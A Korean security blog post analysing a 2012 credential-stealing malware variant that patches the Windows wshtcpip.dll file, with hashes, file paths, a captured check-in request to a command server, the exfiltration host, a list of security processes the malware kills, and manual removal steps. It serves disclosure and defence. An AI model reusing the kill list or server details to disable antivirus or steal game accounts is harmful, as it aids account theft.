주말을 이용한 온라인 게임, 온라인 상품권, 아이템 거래 사이트의 계정 정보를 수집할 목적으로 유포가 이루어지고 있는 악성코드 중 wshtcpip.dll (Windows Sockets Helper DLL) 시스템 파일을 패치하는 변종에 대해 살펴보도록 하겠습니다.


해당 악성코드는 Windows 보안 업데이트, Adobe Flash Player 구 버전 사용자, Oracle JRE 구 버전 사용자가 특정 웹 사이트(언론사 등)에 방문할 경우 자동으로 감염될 수 있습니다.


해당 악성 파일(MD5 : 13ceebadf5498087d95cc2d4f051ce77)은 2012년 4월 6일 금요일 밤 9시 30분경부터 유포가 시작되었으며, AhnLab V3 보안 제품에서는 Win-Trojan/Agent.198144.HP (VirusTotal : 24/42) 진단명으로 진단되고 있습니다.


  wshtcpip.dll + safemon.dll 파일을 이용한 계정 정보 수집 악성코드 주의 (2012.2.4)


참고로 해당 악성코드는 기존의 wshtcpip.dll 악성코드에서 발전된 모습을 보이고 있으므로 참고하시기 바랍니다.

GET /xx/get.asp?mac=13B0 ~(생략)~ 9773&ver=winxp%20Professional&avs=unknow&os=NO. HTTP/1.1
User-Agent: Google page
Host: get.duaser.com
Cache-Control: no-cache

감염이 이루어지는 과정에서는 특정 서버로 사용자 PC의 Mac Address, OS, 보안 제품 정보가 체크되는 것을 확인할 수 있습니다.


이 과정에서 백신 프로그램으로 진단되지 않을 경우 자동으로 종료되는 현상이 발생할 수 있으며, 자체 보호 기능이 활성화되지 않은 경우 백신 프로그램의 재실행에 문제가 발생할 수 있습니다.


감염시 파일 생성 과정을 간략하게 살펴보면 ① "C:\WINDOWS\system32\drivers" 폴더에 (8자리 영문+숫자).sys 드라이버 파일을 생성하여 실시간 감시로 진단되지 않는 백신을 종료하며 ② 시스템 폴더에 Softome.dll 파일을 생성하여 브라우저 도우미 개체(BHO)로 등록하며 ③ "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp" 폴더에 4개의 시스템 파일 패치와 관련된 파일을 생성하며 ④ "C:\WINDOWS\system32\wshtcpip.dll" 시스템 파일의 이름을 변경하여 백업한 후 악성 wshtcpip.dll 파일로 패치를 합니다.


[생성 / 변경 파일 및 진단 정보]


C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\A1.zip :: ws2help.dll 시스템 파일(정상 파일)

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\B1.zip :: wshtcpip.dll 시스템 파일(정상 파일)


C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\wgY2Je.dll
 - MD : 9f06d1c9a0e8e8a78ef335300819fbaa
 - AhnLab V3 : Win-Trojan/Onlinegamehack.58880.CA (VirusTotal : 14/42)
※ 해당 파일은 (영문+숫자).dll 파일 형태입니다.


C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\ysoi.dll :: wshtcpip.dll 악성 파일
 - MD5 : a8f9ea2e01004e9b19438016c5014ebf
 - AhnLab V3 : Win-Trojan/Onlinegamehack.58880.CA (VirusTotal : 14/42)
※ 해당 파일은 (영문+숫자).dll 파일 형태입니다.


C:\WINDOWS\system32\drivers\5b39b8d7.sys
 - MD5 : fd9a94c7a09039d77ca6dabd93629dd5
 - AhnLab V3 : Win-Trojan/Avkiller.13568.C (VirusTotal : 12/42)
※ 해당 파일은 (8자리 영문+숫자).sys 파일 형태입니다.


C:\WINDOWS\system32\Softome.dll :: BHO 등록 파일
 - MD5 : 6c73b4377b25c71bafaf2d4cbb0f5966
 - AhnLab V3 : Win-Trojan/Onlinegamehack.49152.FD (VirusTotal : 10/42)


C:\WINDOWS\system32\wshtcpip.dll :: 변경 전 파일 크기(19,456 Bytes) / 변경 후 파일 크기(58,880 Bytes)
 - MD5 : a8f9ea2e01004e9b19438016c5014ebf
 - AhnLab V3 : Win-Trojan/Onlinegamehack.58880.CA / nProtect : Trojan/W32.Forwarded.Gen (VirusTotal : 13/42)


C:\WINDOWS\system32\wshtcpme.dll :: wshtcpip.dll 백업 파일(정상 파일)


C:\WINDOWS\system32\Yigi :: wshtcpip.dll 백업 파일(정상 파일)
※ 해당 파일은 확장자가 없는 (영문+숫자) 파일 형태입니다. 


1. "C:\WINDOWS\system32\drivers\5b39b8d7.sys" 악성 드라이버 파일

생성시마다 랜덤(Random)한 파일명을 가지는 해당 파일의 기능은 maplestory.exe, heroes.exe, wow.exe, x2.exe, pcotp.exe, dnf.exe, lin.bin, winbaram.exe 온라인 게임 관련 프로세스가 동작시 다음의 국내외 보안 제품을 종료하는 AVKiller 기능을 담당합니다.

navw32.exe, ccsvchst.exe, ekrn.exe, egui.exe, msseces.exe, aosrts.exe, mupdate2.exe, naveragent.exe, sgrun.exe, sgsvc.exe, v3ltray.exe, v3lrun.exe, v3lsvc.exe, udaterui.exe, mctray.exe, shstat.exe, avastui.exe, ashupd.exe, avastsvc.exe, avgupd.exe, avgwdsvc.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe, bdreinit.exe, bdagent.exe, seccenter.exe, vsserv.exe, updatesrv.exe, ayagent.aye, ayupdsrv.aye, ayrtsrv.aye, avp.exe, nsavsvc.npc, nsvmon.npc, nvcagent.npc, avwsc.exe, avupgsvc.exe, avscan.exe, avcenter.exe, avgnt.exe

해당 파일은 정해진 파일명이 아니므로 보안 제품을 통한 진단이 되지 않는 경우에는 그림과 같이 13,568 Bytes 파일 크기를 가진 (8자리 영문+숫자).sys 파일을 찾아 삭제를 하시기 바랍니다.(※ 파일 수정한 날짜가 감염 날짜와 일치합니다.)


2. "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp" 폴더 내부 파일

숨김(H) 속성 폴더 값을 가지는 임시 폴더 내부에 생성된 4개의 파일을 살펴보면 A1.zip, A2.zip 파일은 고정된 파일로 파일 확장자명은 zip 압축 파일이지만 실제로는 A1.zip (= ws2help.dll), A2.zip (= wshtcpip.dll) 시스템 파일(정상 파일)입니다.


또한 랜덤(Random)한 파일명을 가지는 2개의 dll 파일은 감염시 wshtcpip.dll 시스템 파일 패치을 담당하는 악성 파일이므로, 수동으로 삭제시 (영문+숫자).dll 파일 형태를 가지는 파일을 삭제하시기 바랍니다.


3. "C:\WINDOWS\system32\Softome.dll" 브라우저 도우미 개체(BHO) 악성 파일

해당 파일의 속성값을 확인해보면 "safemon Module (safemon.dll)" 파일로 표시되어 있으며, 감염시 브라우저 도우미 개체(BHO)로 자신을 등록하는 과정에서 다음과 같은 동작을 합니다.

감염 이전에 웹 브라우저 추가 기능 관리에 등록된 정상적인 브라우저 도우미 개체(BHO) 등록값을 감염 과정에서 모두 삭제 처리한 후 자신만 등록되는 동작을 확인할 수 있습니다.


[추가 기능 관리 : 도구 모음 및 확장 프로그램]


이름 : IEHlprObj Class
유형 : 브라우저 도우미 개체
CLSID : {1E8AD682-7232-4EB5-B105-8033E4B4A885}
파일 : C:\WINDOWS\system32\Softome.dll


이로 인하여 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\Browser Helper Objects"
레지스트리 값에 등록된 다수의 정상적인 브라우저 도우미 개체(BHO) CLSID 값이 삭제되므로, 악성코드 치료 후에도 복구가 되지 않는 문제가 있으므로 사용자가 일부 프로그램의 동작에 문제가 발생할 수 있으므로 관련 프로그램은 재설치를 해야 합니다.

  1. heroes.nexon.com
  2. nexon.com
  3. happymoney.co.kr
  4. teencash.co.kr
  5. cultureland.co.kr
  6. booknlife.com
  7. capogames.net
  8. dragonnest.nexon.com
  9. elsword.nexon.com
  10. clubaudition.ndolfin.com
  11. netmarble.net
  12. itemmania.com
  13. itembay.com
  14. pmang.com
  15. aion.plaync.jp
  16. plaync.co.kr
  17. maplestory.nexon.com
  18. hangame.com
  19. fifaonline.pmang.com
  20. df.nexon.com
  21. baram.nexon.com

또한 해당 파일은 온라인 게임, 온라인 문화 상품권, 아이템 거래 사이트에 사용자가 접속하여 로그인을 하는 과정을 모니터링하는 동작을 합니다.


4. "C:\WINDOWS\system32\wshtcpip.dll" 악성 시스템 파일

해당 악성코드는 wshtcpip.dll 시스템 파일을 감염을 통해 악성 파일로 패치하며, 파일 속성값을 확인해보면 좌측의 정상적인 wshtcpip.dll 시스템 파일과 비교하여 wshtcpip.dll 악성 파일은 "버전" 탭이 존재하지 않는 것이 특징입니다.

참고로 감염시 wshtcpip.dll 시스템 파일은 이름이 변경되어 "C:\WINDOWS\system32\Yigi" 파일과 같은 형태로 랜덤(Random)한 확장자명을 가지지 않는 파일로 백업되며, 패치된 wshtcpip.dll 악성 시스템 파일은 wshtcpme.dll 파일을 참조하여 동작합니다.

실제로 패치된 wshtcpip.dll 악성 시스템 파일의 Export Table을 살펴보면 백업된 wshtcpme.dll 파일을 참조하여 기능을 수행하는 것을 확인할 수 있습니다.

또한 wshtcpip.dll 악성 파일은 추가적으로 다음의 백신 프로그램의 동작을 방해하는 것을 확인할 수 있습니다.

  1. AhnLab MyFirewall : aosrts.exe
  2. AhnLab SiteGuard : SgRun.exe, Sgui.exe, SgSvc.exe
  3. AhnLab V3 : MUpdate2.exe, V3LTray.exe, V3LRun.exe, V3LSvc.exe, AhnFlt2k.sys, AhnFltNt.sys, AhnRec2k.sys, AhnRecNt.sys, AhnRghNt.sys, ahnsze.sys, v3core.sys, v3engine.sys
  4. avast! : AvastUI.exe, ashUpd.exe, avwsc.exe
  5. AVG : avgupd.exe, avgfrw.exe, avgrsx.exe, avgnsx.exe, avgemc.exe, avgam.exe
  6. Avira AntiVir : avupgsvc.exe, avscan.exe, avguard.exe, avcenter.exe
  7. BitDefender : bdreinit.exe, seccenter.exe, vsserv.exe, updatesrv.exe
  8. ESET NOD32 : egui.exe
  9. McAfee : UdaterUI.exe, shstat.exe
  10. Norton : Navw32.exe
  11. 알약(ALYac) : AYAgent.aye, AYUpdSrv.aye, AYRTSrv.aye, EstRtw.sys
  12. 네이버 백신(Naver Vaccine) : NaverAgent.exe, Nsavsvc.npc, Nsvmon.npc, NVCAgent.npc

이를 통해 자신의 동작을 방해 받지 않게 만든 상태에서 사용자가 모니터링되는 특정 웹 사이트에 접속하여 로그인을 시도할 경우 수집된 계정 정보를 특정 서버로 전송하는 동작을 확인할 수 있습니다.

넷마블(NetMarble) 로그인시 유출되는 정보

테스트에서는 미국(USA)에 위치한 50.117.126.27(blue.psersa.com) 서버로 계정 정보(아이디(ID), 비밀번호)가 전송되는 것을 확인할 수 있습니다.


위와 같은 악성 파일에 감염된 경우 백신을 통한 진단 및 치료에 문제가 있는 경우 다음과 같은 절차에 따라 문제를 해결하시기 바랍니다.(※ 반드시 모든 프로그램을 종료한 상태에서 진행하시기 바랍니다.)


(1) Internet Explorer 웹 브라우저를 실행하여 추가 기능 관리에 등록된 "IEHlprObj Class" 브라우저 도우미 개체(BHO) 항목을 선택하여 "사용 안 함"으로 변경하신 후 웹 브라우저를 종료하시기 바랍니다.


(2) 윈도우 탐색기를 통해 다음의 파일을 수동으로 삭제하시기 바랍니다.(※ 폴더 옵션에서 "보기 → 숨김 파일 및 폴더 숨김 파일 및 폴더 표시"에 체크를 하시기 바랍니다.)

  • C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\A1.zip
  • C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\B1.zip
  • C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\wgY2Je.dll
  • C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\ysoi.dll
  • C:\WINDOWS\system32\drivers\5b39b8d7.sys

wgY2Je.dll, ysoi.dll, 5b39b8d7.sys 파일은 파일명이 다르게 생성되므로 게시글 내용을 참고하시기 바랍니다.


(3) 레지스트리 편집기(regedit)를 실행하여 다음의 레지스트리 값을 삭제하시기 바랍니다.(※ 레지스트리 값은 삭제 후 복원이 불가능하므로 매우 주의하시기 바랍니다.)


HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1E8AD682-7232-4EB5-B105-8033E4B4A885}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\HOOK_ID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\SYS_DLL
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IEHlprObj.IEHlprObj.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1E8AD681-7232-4EB5-B105-8033E4B4A885}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{1E8AD688-7232-4EB5-B105-8033E4B4A885}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{1E8AD682-7232-4EB5-B105-8033E4B4A885}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_5B39B8D7
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\5b39b8d7

붉은색(5B39B8D7) 체크값은 "C:\WINDOWS\system32\drivers\5b39b8d7.sys" 파일명에 종속되므로 파일명을 참고하시기 바랍니다.

"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_
5B39B8D7"
레지스트리 값은 삭제시 "키 삭제 오류" 창이 생성되므로 다음과 같은 절차에 따라 삭제를 진행하시기 바랍니다.

"LEGACY_5B39B8D7" 키 값에 마우스 우클릭을 통해 "사용 권한"을 클릭하여 "Everyone의 사용 권한 → 모든 권한" 항목에서 "허용" 값에 체크를 하시고 삭제를 진행하시면 정상적으로 삭제가 됩니다.


(4) 윈도우 탐색기를 통해 다음의 파일을 찾아 확장자명을 변경하시기 바랍니다.

  • C:\WINDOWS\system32\Softome.dll → Softome.dll-Malware
  • C:\WINDOWS\system32\wshtcpip.dll → wshtcpip.dll-Malware

wshtcpip.dll 악성 시스템 파일의 확장자를 변경하는 경우 윈도우 파일 보호(WFP) 기능을 통해 자동으로 정상적인 wshtcpip.dll 파일이 복원되므로, 사용자는 반드시 윈도우 탐색기를 종료하였다가 재실행하여 그림과 같이 wshtcpip.dll 파일이 복원되었는지 확인하시고 시스템 재부팅을 하시기 바랍니다.


만약 wshtcpip.dll 시스템 파일이 복원되지 않은 상태에서 시스템 재부팅을 할 경우 블루 스크린(BSoD) 생성 등으로 윈도우 진입이 불가능할 수 있으므로 매우 주의하시기 바랍니다.


(5) 시스템 재부팅 후 다음의 파일을 수동으로 삭제하시기 바랍니다.

  • C:\WINDOWS\system32\Softome.dll-Malware
  • C:\WINDOWS\system32\wshtcpip.dll-Malware
  • C:\WINDOWS\system32\wshtcpme.dll
  • C:\WINDOWS\system32\Yigi

참고로 "C:\WINDOWS\system32\Yigi" 백업 파일은 랜덤(Random)한 파일명을 가지므로 게시글 내용을 참고하시기 바랍니다.


모든 작업이 완료된 후에는 백신 프로그램을 이용하여 정밀 검사를 하시기 바라며, 해당 악성코드 감염자는 반드시 윈도우 보안 업데이트, Adobe Flash Player 및 Oracle JRE 프로그램을 최신 버전으로 업데이트를 하시고 인터넷을 이용하시기 바랍니다.


그렇지 않는다면 조만간 인터넷을 이용하는 과정에서 또 다른 악성 파일에 자동으로 감염되는 일이 반복적으로 발생하게 됩니다.

블로그 이미지

울지않는 벌새

울지않는벌새가 되고 싶은 나..